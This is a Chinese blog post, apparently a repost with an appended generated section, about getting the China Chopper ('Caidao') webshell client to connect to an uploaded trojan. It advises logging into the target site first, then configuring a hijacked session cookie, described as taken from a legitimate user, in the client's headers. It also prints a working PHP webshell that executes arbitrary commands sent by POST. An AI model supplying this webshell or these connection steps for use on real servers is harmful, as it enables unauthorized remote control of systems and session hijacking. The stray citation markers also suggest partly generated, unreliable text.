菜刀不能成功连接已上传木马

前言

  今天在渗透测试是通过后台上传了一个木马,并能成功访问,但是用菜刀却连接不上,如图1,图2所示:
图1
图1
图2
图2

解决方法

  刚开始我以为是我的菜刀的问题,于是丢给一个朋友,但是他反应不能访问,于是想到可能是没有登录的原因,导致没有权限访问!
此时我们需要使用菜刀进行登录网站,然后再用菜刀连接木马!首先我们在菜刀的链接处选中浏览网站,如图3所示:
图3
图3
然后去输入登录页面地址,使用账号进行登录,当成功登录之后,我们就再次去访问我们的木马,发现可成功通过木马连接上服务器!



本文转自 eth10 51CTO博客,原文链接:http://blog.51cto.com/eth10/2048319

### 菜刀工具使用 Cookie 进行连接的方法 菜刀是一种常用的 WebShell 工具,广泛应用于渗透测试和安全研究领域。为了实现通过 Cookie 的方式连接目标服务器上的木马文件,以下是具体的说明: #### 1. 准备工作 在开始之前,确保已经上传了一个支持身份验证机制的 PHP 文件到目标服务器上。该文件可以通过 POST 请求或其他方式进行交互,并返回相应的会话信息(如 Session ID 或 Token)。这些信息通常存储在浏览器中的 Cookies 中。 #### 2. 配置目标地址与路径 打开菜刀软件,在界面中填写目标 URL 地址以及对应的 Shell 文件路径。如果目标站点启用了 HTTPS 协议,则需要勾选 SSL/TLS 加密选项以保障通信的安全性[^1]。 #### 3. 设置认证参数 当面对需要身份验证才能访问的 Webshell 时,可以在菜刀界面上指定请求头内的额外字段来满足条件。对于基于 Cookie 认证的情况来说: - 找到程序设置区域; - 添加名为 `Cookie` 的 HTTP Header 参数; - 将实际登录成功后获得的有效值填入其中作为其内容部分[^5]。 例如,假设从合法用户的操作过程中截获到了如下形式的一个有效 session cookie 字符串: ``` PHPSESSID=abcdefg123456789; ``` 那么就应该这样配置: ```plaintext Header Name: Cookie Header Value: PHPSESSID=abcdefg123456789; ``` #### 4. 测试连接 完成上述步骤之后点击“连接”按钮即可尝试建立控制通道。此时菜刀将会按照设定好的规则发送包含特定 cookies 的 HTTP 请求至远程主机并解析响应数据包从而达到操控目的[^4]。 需要注意的是,由于不同版本或者自定义开发出来的 web shells 可能存在差异因此可能还需要调整其他一些细节比如编码方式等等才能够顺利完成整个流程[^3]。 --- ### 示例代码片段 下面展示了一段简单的 PHP Webshell 示例代码,它接受来自客户端传递过来的数据并通过 system() 函数执行命令后再把结果回显出来供使用者查看分析。 ```php <?php if(isset($_POST['cmd'])){ echo "<pre>"; $output = shell_exec($_POST['cmd']); echo htmlspecialchars($output); echo "</pre>"; } ?> ``` 此脚本允许任何能够向其提交表单的人运行任意操作系统级别的指令——当然前提是他们知道正确的端点名称(`cmd`)并且具有适当权限去触发这个逻辑分支[^2]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值